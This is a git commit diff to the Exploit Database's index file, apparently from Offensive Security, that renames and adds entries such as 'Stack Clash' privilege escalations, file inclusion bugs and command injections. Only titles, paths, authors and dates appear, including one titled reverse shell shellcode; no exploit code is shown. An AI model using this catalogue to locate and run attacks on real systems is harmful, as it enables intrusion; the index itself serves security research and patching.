DB: 2017-07-20

23 new exploits

Linux Kernel 3.0.5 - 'test_root()' Function Local Denial of Service
Linux Kernel 3.0.5 - 'test_root()' Local Denial of Service

SquirrelMail - 'chpasswd' Privilege Escalation (Brute Force Exploit)
SquirrelMail - 'chpasswd' Local Privilege Escalation (Brute Force)

Kaspersky 17.0.0 - Local CA root Incorrectly Protected
Kaspersky 17.0.0 - Local CA Root Incorrectly Protected

Castripper 2.50.70 - '.pls' File Stack Buffer Overflow DEP Bypass
Castripper 2.50.70 - '.pls' File Stack Buffer Overflow (DEP Bypass)

WICD - Local Privilege Esclation Exploit
WICD 1.7.1 - Local Privilege Escalation

Crouzet em4 soft 1.1.04 and M3 soft 3.1.2.0 - Insecure File Permissions
Crouzet em4 soft 1.1.04 / M3 soft 3.1.2.0 - Insecure File Permissions
Oracle Solaris 11.1/11.3 (RSH) - Local Privilege Escalation 'Stack Clash' Exploit
OpenBSD - 'at' Local Privilege Escalation 'Stack Clash' Exploit
Oracle Solaris 11.1/11.3 (RSH) - 'Stack Clash' Local Privilege Escalation
OpenBSD - 'at' 'Stack Clash' Local Privilege Escalation
Linux Kernel (Debian 7/8/9/10 / Fedora 23/24/25 / CentOS 5.3/5.11/6.0/6.8/7.2.1511) - 'ldso_hwcap' Local Privilege Escalation 'Stack Clash' Exploit
Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64' Local Privilege Escalation 'Stack Clash' Exploit
Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic' Local Privilege Escalation 'Stack Clash' Exploit
Linux Kernel (Debian 7/8/9/10 / Fedora 23/24/25 / CentOS 5.3/5.11/6.0/6.8/7.2.1511) - 'ldso_hwcap' 'Stack Clash' Local Privilege Escalation
Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64' 'Stack Clash' Local Privilege Escalation
Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic' 'Stack Clash' Local Privilege Escalation

Hashicorp vagrant-vmware-fusion <= 4.0.20 - Local root Privilege Esclation
Hashicorp vagrant-vmware-fusion < 4.0.20 - Local Root Privilege Escalation

HP OpenView Network Node Manager (OV NNM) 7.53 - OvJavaLocale Buffer Overflow

McAfee LinuxShield 1.5.1 - Local/Remote File Inclusion / Remote Code Execution

Symantec Web Gateway 5.0.2 - Local/Remote File Inclusion / Remote Code Execution

Symantec Web Gateway 5.0.3.18 - Local/Remote File Inclusion / Remote Command Execution

Trend Micro Interscan VirusWall localweb - Directory Traversal

Novell Zenworks Mobile Device Managment 2.6.1/2.7.0 - Local File Inclusion (Metasploit)

Thomson SpeedTouch 500 Series - LocalNetwork Page name Parameter Cross-Site Scripting

Zimbra Collaboration Server 7.2.2/8.0.2 - Local File Inclusion (Metasploit)

XAMPP 1.6.x - 'showcode.php' Local File Inclusion

Yealink VoIP Phone SIP-T38G - Local File Inclusion

InterPhoto Image Gallery 2.4.2 - 'IPLANG' Parameter Local File Inclusion

Lotus Mail Encryption Server 2.1.0.1 (Protector for Mail) - Local File Inclusion / Remote Code Execution (Metasploit)

DreamBox DM800 - 'file' Parameter Local File Disclosure

Xavi 7968 ADSL Router - webconfig/lan/lan_config.html/local_lan_config host_name_txtbox Parameter Cross-Site Scripting

TP-Link TL-WR841N Router - Local File Inclusion

Mobile USB Drive HD - Multiple Local File Inclusion / Arbitrary File Upload Vulnerabilities

Multiple D-Link DIR Series Routers - 'model/__show_info.php' Local File Disclosure

Linux/x86_64 - Reverse Shell (192.168.1.8:4444) Shellcode (104 bytes)

Vivvo Article Manager 3.4 - (root) Local File Inclusion
Vivvo Article Manager 3.4 - 'root' Local File Inclusion

60cycleCMS 2.5.2 - (DOCUMENT_ROOT) Multiple Local File Inclusion
60cycleCMS 2.5.2 - 'DOCUMENT_ROOT' Multiple Local File Inclusion

HP OpenView Network Node Manager (OV NNM) 7.53 - 'OvJavaLocale' Buffer Overflow

McAfee LinuxShield 1.5.1 - Local/Remote File Inclusion / Remote Code Execution

Symantec Web Gateway 5.0.2 - Local/Remote File Inclusion / Remote Code Execution

Symantec Web Gateway 5.0.3.18 - Local/Remote File Inclusion / Remote Command Execution

Trend Micro Interscan VirusWall localweb - Directory Traversal

Novell Zenworks Mobile Device Managment 2.6.1/2.7.0 - Local File Inclusion (Metasploit)

Thomson SpeedTouch 500 Series - LocalNetwork Page name Parameter Cross-Site Scripting
Campsite 2.6.1 - 'LocalizerConfig.php' g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 - 'LocalizerLanguage.php' g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 - 'LocalizerConfig.php' 'g_documentRoot' Parameter Remote File Inclusion
Campsite 2.6.1 - 'LocalizerLanguage.php' 'g_documentRoot' Parameter Remote File Inclusion

Zimbra Collaboration Server 7.2.2/8.0.2 - Local File Inclusion (Metasploit)

XAMPP 1.6.x - 'showcode.php' Local File Inclusion

Yealink VoIP Phone SIP-T38G - Local File Inclusion

InterPhoto Image Gallery 2.4.2 - 'IPLANG' Parameter Local File Inclusion

Lotus Mail Encryption Server 2.1.0.1 (Protector for Mail) - Local File Inclusion / Remote Code Execution (Metasploit)

DreamBox DM800 - 'file' Parameter Local File Disclosure

Xavi 7968 ADSL Router - webconfig/lan/lan_config.html/local_lan_config host_name_txtbox Parameter Cross-Site Scripting

TP-Link TL-WR841N Router - Local File Inclusion

Mobile USB Drive HD - Multiple Local File Inclusion / Arbitrary File Upload Vulnerabilities

Multiple D-Link DIR Series Routers - 'model/__show_info.php' Local File Disclosure

Barracuda Load Balancer Firmware <= 6.0.1.006 - Remote Command Injection (Metasploit)
Barracuda Load Balancer Firmware < 6.0.1.006 - Remote Command Injection (Metasploit)
Sonicwall Secure Remote Access 8.1.0.2-14sv - Command Injection
Sonicwall < 8.1.0.6-21sv - 'gencsr.cgi' Command Injection (Metasploit)
Netscaler SD-WAN 9.1.2.26.561201 - Command Injection (Metasploit)
Sonicwall < 8.1.0.2-14sv - 'sitecustomization.cgi' Command Injection (Metasploit)
Citrix CloudBridge - 'CAKEPHP' Cookie Command Injection
This commit is contained in:
Offensive Security 2017-07-20 05:01:21 +00:00
parent 21f7dd8438
commit 9640473c86
24 changed files with 919 additions and 34 deletions

View file

@ -4793,7 +4793,7 @@ id,file,description,date,author,platform,type,port
38564,platforms/windows/dos/38564.py,"Sam Spade 1.14 - Scan From IP Address Field (SEH) Overflow Crash (SEH) (PoC)",2015-10-29,"Luis Martínez",windows,dos,0 38564,platforms/windows/dos/38564.py,"Sam Spade 1.14 - Scan From IP Address Field (SEH) Overflow Crash (SEH) (PoC)",2015-10-29,"Luis Martínez",windows,dos,0
38566,platforms/hardware/dos/38566.py,"NetUSB - Kernel Stack Buffer Overflow",2015-10-29,"Adrián Ruiz Bermudo",hardware,dos,0 38566,platforms/hardware/dos/38566.py,"NetUSB - Kernel Stack Buffer Overflow",2015-10-29,"Adrián Ruiz Bermudo",hardware,dos,0
38580,platforms/windows/dos/38580.txt,"Microsoft Windows - NtCreateLowBoxToken Handle Capture Local Denial of Service / Privilege Escalation (MS15-111)",2015-10-30,"Google Security Research",windows,dos,0 38580,platforms/windows/dos/38580.txt,"Microsoft Windows - NtCreateLowBoxToken Handle Capture Local Denial of Service / Privilege Escalation (MS15-111)",2015-10-30,"Google Security Research",windows,dos,0
38589,platforms/linux/dos/38589.c,"Linux Kernel 3.0.5 - 'test_root()' Function Local Denial of Service",2013-06-05,"Jonathan Salwan",linux,dos,0 38589,platforms/linux/dos/38589.c,"Linux Kernel 3.0.5 - 'test_root()' Local Denial of Service",2013-06-05,"Jonathan Salwan",linux,dos,0
38595,platforms/multiple/dos/38595.txt,"Oracle VM VirtualBox 4.0 - 'tracepath' Local Denial of Service",2013-06-26,"Thomas Dreibholz",multiple,dos,0 38595,platforms/multiple/dos/38595.txt,"Oracle VM VirtualBox 4.0 - 'tracepath' Local Denial of Service",2013-06-26,"Thomas Dreibholz",multiple,dos,0
38610,platforms/android/dos/38610.txt,"Samsung Galaxy S6 Samsung Gallery - GIF Parsing Crash",2015-11-03,"Google Security Research",android,dos,0 38610,platforms/android/dos/38610.txt,"Samsung Galaxy S6 Samsung Gallery - GIF Parsing Crash",2015-11-03,"Google Security Research",android,dos,0
38611,platforms/android/dos/38611.txt,"Samsung Galaxy S6 - android.media.process Face Recognition Memory Corruption",2015-11-03,"Google Security Research",android,dos,0 38611,platforms/android/dos/38611.txt,"Samsung Galaxy S6 - android.media.process Face Recognition Memory Corruption",2015-11-03,"Google Security Research",android,dos,0
@ -5735,7 +5735,7 @@ id,file,description,date,author,platform,type,port
401,platforms/windows/local/401.c,"IPSwitch IMail Server 8.1 - Local Password Decryption Utility",2004-08-18,Adik,windows,local,0 401,platforms/windows/local/401.c,"IPSwitch IMail Server 8.1 - Local Password Decryption Utility",2004-08-18,Adik,windows,local,0
403,platforms/windows/local/403.c,"IPD (Integrity Protection Driver) - Local Exploit",2004-08-18,anonymous,windows,local,0 403,platforms/windows/local/403.c,"IPD (Integrity Protection Driver) - Local Exploit",2004-08-18,anonymous,windows,local,0
411,platforms/linux/local/411.c,"Sendmail 8.11.x (Linux/i386) - Exploit",2001-01-01,sd,linux,local,0 411,platforms/linux/local/411.c,"Sendmail 8.11.x (Linux/i386) - Exploit",2001-01-01,sd,linux,local,0
417,platforms/linux/local/417.c,"SquirrelMail - 'chpasswd' Privilege Escalation (Brute Force Exploit)",2004-08-25,Bytes,linux,local,0 417,platforms/linux/local/417.c,"SquirrelMail - 'chpasswd' Local Privilege Escalation (Brute Force)",2004-08-25,Bytes,linux,local,0
434,platforms/linux/local/434.sh,"CDRDAO - Privilege Escalation",2004-09-07,"Karol Wiêsek",linux,local,0 434,platforms/linux/local/434.sh,"CDRDAO - Privilege Escalation",2004-09-07,"Karol Wiêsek",linux,local,0
438,platforms/linux/local/438.c,"CDRecord's ReadCD - '$RSH' 'exec()' SUID Shell Creation",2004-09-11,I)ruid,linux,local,0 438,platforms/linux/local/438.c,"CDRecord's ReadCD - '$RSH' 'exec()' SUID Shell Creation",2004-09-11,I)ruid,linux,local,0
466,platforms/linux/local/466.pl,"htpasswd Apache 1.3.31 - Local Exploit",2004-09-16,"Luiz Fernando Camargo",linux,local,0 466,platforms/linux/local/466.pl,"htpasswd Apache 1.3.31 - Local Exploit",2004-09-16,"Luiz Fernando Camargo",linux,local,0
@ -6205,7 +6205,7 @@ id,file,description,date,author,platform,type,port
7135,platforms/windows/local/7135.htm,"Opera 9.62 - 'file://' Local Heap Overflow",2008-11-17,"Guido Landi",windows,local,0 7135,platforms/windows/local/7135.htm,"Opera 9.62 - 'file://' Local Heap Overflow",2008-11-17,"Guido Landi",windows,local,0
7171,platforms/multiple/local/7171.txt,"PHP 5.2.6 - 'error_log' Safe_mode Bypass Exploit",2008-11-20,SecurityReason,multiple,local,0 7171,platforms/multiple/local/7171.txt,"PHP 5.2.6 - 'error_log' Safe_mode Bypass Exploit",2008-11-20,SecurityReason,multiple,local,0
7177,platforms/linux/local/7177.c,"Oracle Database Vault - 'ptrace(2)' Privilege Escalation",2008-11-20,"Jakub Wartak",linux,local,0 7177,platforms/linux/local/7177.c,"Oracle Database Vault - 'ptrace(2)' Privilege Escalation",2008-11-20,"Jakub Wartak",linux,local,0
40988,platforms/windows/local/40988.c,"Kaspersky 17.0.0 - Local CA root Incorrectly Protected",2017-01-04,"Google Security Research",windows,local,0 40988,platforms/windows/local/40988.c,"Kaspersky 17.0.0 - Local CA Root Incorrectly Protected",2017-01-04,"Google Security Research",windows,local,0
7264,platforms/windows/local/7264.txt,"Apache Tomcat (Windows) - 'runtime.getRuntime().exec()' Privilege Escalation",2008-11-28,Abysssec,windows,local,0 7264,platforms/windows/local/7264.txt,"Apache Tomcat (Windows) - 'runtime.getRuntime().exec()' Privilege Escalation",2008-11-28,Abysssec,windows,local,0
7309,platforms/windows/local/7309.pl,"Cain & Abel 4.9.24 - '.rdp' Stack Overflow",2008-11-30,SkD,windows,local,0 7309,platforms/windows/local/7309.pl,"Cain & Abel 4.9.24 - '.rdp' Stack Overflow",2008-11-30,SkD,windows,local,0
7313,platforms/linux/local/7313.sh,"Debian - (Symlink In Login) Arbitrary File Ownership (PoC)",2008-12-01,"Paul Szabo",linux,local,0 7313,platforms/linux/local/7313.sh,"Debian - (Symlink In Login) Arbitrary File Ownership (PoC)",2008-12-01,"Paul Szabo",linux,local,0
@ -6720,7 +6720,7 @@ id,file,description,date,author,platform,type,port
13761,platforms/windows/local/13761.pl,"Easy CD-DA Recorder 2007 - Buffer Overflow (SEH)",2010-06-07,chap0,windows,local,0 13761,platforms/windows/local/13761.pl,"Easy CD-DA Recorder 2007 - Buffer Overflow (SEH)",2010-06-07,chap0,windows,local,0
13763,platforms/windows/local/13763.pl,"Audio Converter 8.1 - Stack Buffer Overflow (PoC) ROP/WPM",2010-06-07,sud0,windows,local,0 13763,platforms/windows/local/13763.pl,"Audio Converter 8.1 - Stack Buffer Overflow (PoC) ROP/WPM",2010-06-07,sud0,windows,local,0
13767,platforms/windows/local/13767.c,"SureThing CD Labeler (m3u/pls) - Unicode Stack Overflow (PoC)",2010-06-08,mr_me,windows,local,0 13767,platforms/windows/local/13767.c,"SureThing CD Labeler (m3u/pls) - Unicode Stack Overflow (PoC)",2010-06-08,mr_me,windows,local,0
13768,platforms/php/local/13768.py,"Castripper 2.50.70 - '.pls' File Stack Buffer Overflow DEP Bypass",2010-06-08,mr_me,php,local,0 13768,platforms/php/local/13768.py,"Castripper 2.50.70 - '.pls' File Stack Buffer Overflow (DEP Bypass)",2010-06-08,mr_me,php,local,0
13806,platforms/windows/local/13806.txt,"ActivePerl 5.8.8.817 - Buffer Overflow",2010-06-09,PoisonCode,windows,local,0 13806,platforms/windows/local/13806.txt,"ActivePerl 5.8.8.817 - Buffer Overflow",2010-06-09,PoisonCode,windows,local,0
13820,platforms/windows/local/13820.pl,"Power Tab Editor 1.7 (Build 80) - Buffer Overflow",2010-06-11,sud0,windows,local,0 13820,platforms/windows/local/13820.pl,"Power Tab Editor 1.7 (Build 80) - Buffer Overflow",2010-06-11,sud0,windows,local,0
13895,platforms/windows/local/13895.py,"Rosoft Audio Converter 4.4.4 - Buffer Overflow",2010-06-16,blake,windows,local,0 13895,platforms/windows/local/13895.py,"Rosoft Audio Converter 4.4.4 - Buffer Overflow",2010-06-16,blake,windows,local,0
@ -7184,7 +7184,7 @@ id,file,description,date,author,platform,type,port
18693,platforms/windows/local/18693.py,"BlazeVideo HDTV Player 6.6 Professional - (SEH + ASLR + DEP Bypass)",2012-04-03,b33f,windows,local,0 18693,platforms/windows/local/18693.py,"BlazeVideo HDTV Player 6.6 Professional - (SEH + ASLR + DEP Bypass)",2012-04-03,b33f,windows,local,0
18710,platforms/windows/local/18710.rb,"Csound - '.hetro' File Handling Stack Buffer Overflow (Metasploit)",2012-04-06,Metasploit,windows,local,0 18710,platforms/windows/local/18710.rb,"Csound - '.hetro' File Handling Stack Buffer Overflow (Metasploit)",2012-04-06,Metasploit,windows,local,0
18726,platforms/windows/local/18726.py,"Mini-stream RM-MP3 Converter 3.1.2.2 - Local Buffer Overflow",2012-04-09,"SkY-NeT SySteMs",windows,local,0 18726,platforms/windows/local/18726.py,"Mini-stream RM-MP3 Converter 3.1.2.2 - Local Buffer Overflow",2012-04-09,"SkY-NeT SySteMs",windows,local,0
18733,platforms/linux/local/18733.py,"WICD - Local Privilege Esclation Exploit",2012-04-12,anonymous,linux,local,0 18733,platforms/linux/local/18733.py,"WICD 1.7.1 - Local Privilege Escalation",2012-04-12,anonymous,linux,local,0
18749,platforms/osx/local/18749.py,"Microsoft Office 2008 SP0 (Mac) - RTF pFragments Exploit",2012-04-18,"Abhishek Lyall",osx,local,0 18749,platforms/osx/local/18749.py,"Microsoft Office 2008 SP0 (Mac) - RTF pFragments Exploit",2012-04-18,"Abhishek Lyall",osx,local,0
18747,platforms/windows/local/18747.rb,"CyberLink Power2Go - name Attribute (p2g) Stack Buffer Overflow (Metasploit)",2012-04-18,Metasploit,windows,local,0 18747,platforms/windows/local/18747.rb,"CyberLink Power2Go - name Attribute (p2g) Stack Buffer Overflow (Metasploit)",2012-04-18,Metasploit,windows,local,0
18748,platforms/windows/local/18748.rb,"GSM SIM Editor 5.15 - Buffer Overflow (Metasploit)",2012-04-18,Metasploit,windows,local,0 18748,platforms/windows/local/18748.rb,"GSM SIM Editor 5.15 - Buffer Overflow (Metasploit)",2012-04-18,Metasploit,windows,local,0
@ -8821,7 +8821,7 @@ id,file,description,date,author,platform,type,port
39446,platforms/win_x86/local/39446.py,"Microsoft Windows 7 (x86) - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040)",2016-02-15,"Rick Larabee",win_x86,local,0 39446,platforms/win_x86/local/39446.py,"Microsoft Windows 7 (x86) - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040)",2016-02-15,"Rick Larabee",win_x86,local,0
39480,platforms/windows/local/39480.py,"Core FTP Server 1.2 - Buffer Overflow (PoC)",2016-02-22,INSECT.B,windows,local,0 39480,platforms/windows/local/39480.py,"Core FTP Server 1.2 - Buffer Overflow (PoC)",2016-02-22,INSECT.B,windows,local,0
39508,platforms/windows/local/39508.ps1,"Comodo Anti-Virus - 'SHFolder.dll' Local Privilege Escalation",2016-02-29,Laughing_Mantis,windows,local,0 39508,platforms/windows/local/39508.ps1,"Comodo Anti-Virus - 'SHFolder.dll' Local Privilege Escalation",2016-02-29,Laughing_Mantis,windows,local,0
39510,platforms/windows/local/39510.txt,"Crouzet em4 soft 1.1.04 and M3 soft 3.1.2.0 - Insecure File Permissions",2016-03-01,LiquidWorm,windows,local,0 39510,platforms/windows/local/39510.txt,"Crouzet em4 soft 1.1.04 / M3 soft 3.1.2.0 - Insecure File Permissions",2016-03-01,LiquidWorm,windows,local,0
39520,platforms/win_x86-64/local/39520.txt,"Secret Net 7 and Secret Net Studio 8 - Privilege Escalation",2016-03-02,Cr4sh,win_x86-64,local,0 39520,platforms/win_x86-64/local/39520.txt,"Secret Net 7 and Secret Net Studio 8 - Privilege Escalation",2016-03-02,Cr4sh,win_x86-64,local,0
39523,platforms/windows/local/39523.rb,"AppLocker - Execution Prevention Bypass (Metasploit)",2016-03-03,Metasploit,windows,local,0 39523,platforms/windows/local/39523.rb,"AppLocker - Execution Prevention Bypass (Metasploit)",2016-03-03,Metasploit,windows,local,0
39525,platforms/win_x86-64/local/39525.py,"Microsoft Windows 7 (x64) - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040)",2016-03-07,"Rick Larabee",win_x86-64,local,0 39525,platforms/win_x86-64/local/39525.py,"Microsoft Windows 7 (x64) - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040)",2016-03-07,"Rick Larabee",win_x86-64,local,0
@ -9128,15 +9128,15 @@ id,file,description,date,author,platform,type,port
42255,platforms/linux/local/42255.py,"JAD Java Decompiler 1.5.8e - Buffer Overflow",2017-06-26,"Juan Sacco",linux,local,0 42255,platforms/linux/local/42255.py,"JAD Java Decompiler 1.5.8e - Buffer Overflow",2017-06-26,"Juan Sacco",linux,local,0
42265,platforms/linux/local/42265.py,"Flat Assembler 1.7.21 - Buffer Overflow",2017-06-28,"Juan Sacco",linux,local,0 42265,platforms/linux/local/42265.py,"Flat Assembler 1.7.21 - Buffer Overflow",2017-06-28,"Juan Sacco",linux,local,0
42267,platforms/windows/local/42267.py,"Easy File Sharing Web Server 7.2 - Account Import Local Buffer Overflow (SEH)",2017-06-28,Chako,windows,local,0 42267,platforms/windows/local/42267.py,"Easy File Sharing Web Server 7.2 - Account Import Local Buffer Overflow (SEH)",2017-06-28,Chako,windows,local,0
42270,platforms/solaris_x86/local/42270.c,"Oracle Solaris 11.1/11.3 (RSH) - Local Privilege Escalation 'Stack Clash' Exploit",2017-06-28,"Qualys Corporation",solaris_x86,local,0 42270,platforms/solaris_x86/local/42270.c,"Oracle Solaris 11.1/11.3 (RSH) - 'Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",solaris_x86,local,0
42271,platforms/openbsd/local/42271.c,"OpenBSD - 'at' Local Privilege Escalation 'Stack Clash' Exploit",2017-06-28,"Qualys Corporation",openbsd,local,0 42271,platforms/openbsd/local/42271.c,"OpenBSD - 'at' 'Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",openbsd,local,0
42273,platforms/lin_x86/local/42273.c,"Linux Kernel - 'offset2lib' 'Stack Clash' Exploit",2017-06-28,"Qualys Corporation",lin_x86,local,0 42273,platforms/lin_x86/local/42273.c,"Linux Kernel - 'offset2lib' 'Stack Clash' Exploit",2017-06-28,"Qualys Corporation",lin_x86,local,0
42274,platforms/lin_x86/local/42274.c,"Linux Kernel (Debian 7/8/9/10 / Fedora 23/24/25 / CentOS 5.3/5.11/6.0/6.8/7.2.1511) - 'ldso_hwcap' Local Privilege Escalation 'Stack Clash' Exploit",2017-06-28,"Qualys Corporation",lin_x86,local,0 42274,platforms/lin_x86/local/42274.c,"Linux Kernel (Debian 7/8/9/10 / Fedora 23/24/25 / CentOS 5.3/5.11/6.0/6.8/7.2.1511) - 'ldso_hwcap' 'Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86,local,0
42275,platforms/lin_x86-64/local/42275.c,"Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64' Local Privilege Escalation 'Stack Clash' Exploit",2017-06-28,"Qualys Corporation",lin_x86-64,local,0 42275,platforms/lin_x86-64/local/42275.c,"Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64' 'Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86-64,local,0
42276,platforms/lin_x86/local/42276.c,"Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic' Local Privilege Escalation 'Stack Clash' Exploit",2017-06-28,"Qualys Corporation",lin_x86,local,0 42276,platforms/lin_x86/local/42276.c,"Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic' 'Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86,local,0
42310,platforms/windows/local/42310.txt,"Pelco VideoXpert 1.12.105 - Privilege Escalation",2017-07-10,LiquidWorm,windows,local,0 42310,platforms/windows/local/42310.txt,"Pelco VideoXpert 1.12.105 - Privilege Escalation",2017-07-10,LiquidWorm,windows,local,0
42325,platforms/windows/local/42325.py,"Counter Strike: Condition Zero - '.BSP' Map File Code Execution",2017-07-07,"Grant Hernandez",windows,local,0 42325,platforms/windows/local/42325.py,"Counter Strike: Condition Zero - '.BSP' Map File Code Execution",2017-07-07,"Grant Hernandez",windows,local,0
42334,platforms/macos/local/42334.txt,"Hashicorp vagrant-vmware-fusion <= 4.0.20 - Local root Privilege Esclation",2017-07-18,"Mark Wadham",macos,local,0 42334,platforms/macos/local/42334.txt,"Hashicorp vagrant-vmware-fusion < 4.0.20 - Local Root Privilege Escalation",2017-07-18,"Mark Wadham",macos,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -10710,7 +10710,6 @@ id,file,description,date,author,platform,type,port
14522,platforms/windows/remote/14522.rb,"Xerver 4.32 - Source Disclosure / HTTP Authentication Bypass (Metasploit)",2010-08-01,"Ben Schmidt",windows,remote,0 14522,platforms/windows/remote/14522.rb,"Xerver 4.32 - Source Disclosure / HTTP Authentication Bypass (Metasploit)",2010-08-01,"Ben Schmidt",windows,remote,0
14539,platforms/windows/remote/14539.html,"FathFTP 1.8 - (RasIsConnected Method) ActiveX Buffer Overflow (SEH)",2010-08-03,Madjix,windows,remote,0 14539,platforms/windows/remote/14539.html,"FathFTP 1.8 - (RasIsConnected Method) ActiveX Buffer Overflow (SEH)",2010-08-03,Madjix,windows,remote,0
14536,platforms/hardware/remote/14536.txt,"EMC Celerra NAS Appliance - Unauthorized Access to Root NFS Export",2010-08-03,"Trustwave's SpiderLabs",hardware,remote,0 14536,platforms/hardware/remote/14536.txt,"EMC Celerra NAS Appliance - Unauthorized Access to Root NFS Export",2010-08-03,"Trustwave's SpiderLabs",hardware,remote,0
14547,platforms/windows/remote/14547.txt,"HP OpenView Network Node Manager (OV NNM) 7.53 - OvJavaLocale Buffer Overflow",2010-08-03,"Nahuel Riva",windows,remote,0
14551,platforms/windows/remote/14551.html,"FathFTP 1.8 - (DeleteFile Method) ActiveX Buffer Overflow (SEH)",2010-08-04,Madjix,windows,remote,0 14551,platforms/windows/remote/14551.html,"FathFTP 1.8 - (DeleteFile Method) ActiveX Buffer Overflow (SEH)",2010-08-04,Madjix,windows,remote,0
14552,platforms/windows/remote/14552.html,"FathFTP 1.8 - (EnumFiles Method) ActiveX Buffer Overflow (SEH)",2010-08-04,Madjix,windows,remote,0 14552,platforms/windows/remote/14552.html,"FathFTP 1.8 - (EnumFiles Method) ActiveX Buffer Overflow (SEH)",2010-08-04,Madjix,windows,remote,0
14553,platforms/windows/remote/14553.html,"FathFTP 1.8 - (FileExists Method) ActiveX Buffer Overflow (SEH)",2010-08-04,H4kr3m,windows,remote,0 14553,platforms/windows/remote/14553.html,"FathFTP 1.8 - (FileExists Method) ActiveX Buffer Overflow (SEH)",2010-08-04,H4kr3m,windows,remote,0
@ -10726,7 +10725,6 @@ id,file,description,date,author,platform,type,port
14641,platforms/multiple/remote/14641.py,"Adobe ColdFusion - Directory Traversal",2010-08-14,Unknown,multiple,remote,0 14641,platforms/multiple/remote/14641.py,"Adobe ColdFusion - Directory Traversal",2010-08-14,Unknown,multiple,remote,0
14674,platforms/windows/remote/14674.txt,"Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050)",2010-08-17,"Piotr Bania",windows,remote,0 14674,platforms/windows/remote/14674.txt,"Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050)",2010-08-17,"Piotr Bania",windows,remote,0
14779,platforms/windows/remote/14779.pl,"Deepin TFTP Server 1.25 - Directory Traversal",2010-08-25,demonalex,windows,remote,0 14779,platforms/windows/remote/14779.pl,"Deepin TFTP Server 1.25 - Directory Traversal",2010-08-25,demonalex,windows,remote,0
14818,platforms/linux/remote/14818.pl,"McAfee LinuxShield 1.5.1 - Local/Remote File Inclusion / Remote Code Execution",2010-08-27,"Nikolas Sotiriu",linux,remote,0
14853,platforms/windows/remote/14853.py,"Adobe Acrobat Reader and Flash Player - 'newclass' Invalid Pointer Exploit",2010-09-01,Abysssec,windows,remote,0 14853,platforms/windows/remote/14853.py,"Adobe Acrobat Reader and Flash Player - 'newclass' Invalid Pointer Exploit",2010-09-01,Abysssec,windows,remote,0
14856,platforms/windows/remote/14856.txt,"TFTPDWIN 0.4.2 - Directory Traversal",2010-09-01,chr1x,windows,remote,0 14856,platforms/windows/remote/14856.txt,"TFTPDWIN 0.4.2 - Directory Traversal",2010-09-01,chr1x,windows,remote,0
14857,platforms/windows/remote/14857.txt,"tftp desktop 2.5 - Directory Traversal",2010-09-01,chr1x,windows,remote,0 14857,platforms/windows/remote/14857.txt,"tftp desktop 2.5 - Directory Traversal",2010-09-01,chr1x,windows,remote,0
@ -11614,7 +11612,6 @@ id,file,description,date,author,platform,type,port
18623,platforms/windows/remote/18623.txt,"LANDesk Lenovo ThinkManagement Suite 9.0.3 Core Server - Arbitrary File Deletion",2012-03-19,rgod,windows,remote,0 18623,platforms/windows/remote/18623.txt,"LANDesk Lenovo ThinkManagement Suite 9.0.3 Core Server - Arbitrary File Deletion",2012-03-19,rgod,windows,remote,0
18624,platforms/windows/remote/18624.txt,"2X Client for RDP 10.1.1204 - ClientSystem Class ActiveX Control Download and Execute",2012-03-19,rgod,windows,remote,0 18624,platforms/windows/remote/18624.txt,"2X Client for RDP 10.1.1204 - ClientSystem Class ActiveX Control Download and Execute",2012-03-19,rgod,windows,remote,0
18625,platforms/windows/remote/18625.txt,"2X ApplicationServer 10.1 - TuxSystem Class ActiveX Control Remote File Overwrite",2012-03-19,rgod,windows,remote,0 18625,platforms/windows/remote/18625.txt,"2X ApplicationServer 10.1 - TuxSystem Class ActiveX Control Remote File Overwrite",2012-03-19,rgod,windows,remote,0
18932,platforms/linux/remote/18932.py,"Symantec Web Gateway 5.0.2 - Local/Remote File Inclusion / Remote Code Execution",2012-05-26,muts,linux,remote,0
